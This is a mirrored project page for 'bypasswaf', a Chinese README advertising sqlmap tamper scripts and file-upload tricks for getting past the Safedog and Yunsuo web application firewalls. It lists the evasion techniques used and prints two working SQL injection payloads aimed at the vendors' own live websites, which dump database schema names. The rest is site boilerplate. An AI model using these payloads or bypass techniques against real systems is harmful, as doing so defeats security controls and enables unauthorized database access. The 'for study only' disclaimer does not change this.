Git Product home page Git Product logo

bypasswaf's Introduction

bypasswaf

仅供学习 请勿用作非法用途

2.0:
增加优化了部分规则 现在bypass云锁tamper及bypass安全狗tamper支持所有的注入类型了!
更新了bypass 安全狗 任意文件上传的方法(适用于业务系统存在任意文件上传漏洞但是服务器安装了安全狗环境)
更新了bypass 安全狗 SQL注入tamper,现在支持所有类型的注入了
更新了bypass 安全狗最新版的tamper 2021.11

针对最新版云锁和安全狗的sqlmap自动化绕过脚本

包含:
bypass安全狗sql注入tamper
bypass云锁SQL注入tamper (可0警告绕过云锁)
理论上来说规则越多速度也会越慢 所以不追求隐蔽性的可以按需求修改规则

针对最新版安全狗的任意文件上传bypass

safedog_upload_yichu.txt
Image text safedog_upload_huanhang.txt
Image text

利用知识点:

安全狗:内联注释
blog:https://pureqh.top/?p=1882
云锁:引号包裹注释符绕过检测
blog:https://pureqh.top/?p=4175
云锁:多行注释符嵌入#绕过检测
blog:https://pureqh.top/?p=4414
文件上传:Content-Disposition参数溢出、文件名换行绕过
blog:https://pureqh.top/?p=1225

注:bypass云锁官网

http://help.yunsuo.com.cn/guide/install/?id=1' REGEXP "[…%252523]" union select 1,group_concat(schema_name),3 from information_schema.schemata -- +

注:bypass安全狗官网

https://www.safedog.cn/news.html?id=-1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,(select %0a group_concat(schema_name %0a /*80000aaa*/) %0a from %0a /*!11444 /*REGEXP "[…%0a%23]"*/ %0a information_schema.schemata*/),3-- +

bypasswaf's People

Contributors

pureqh avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.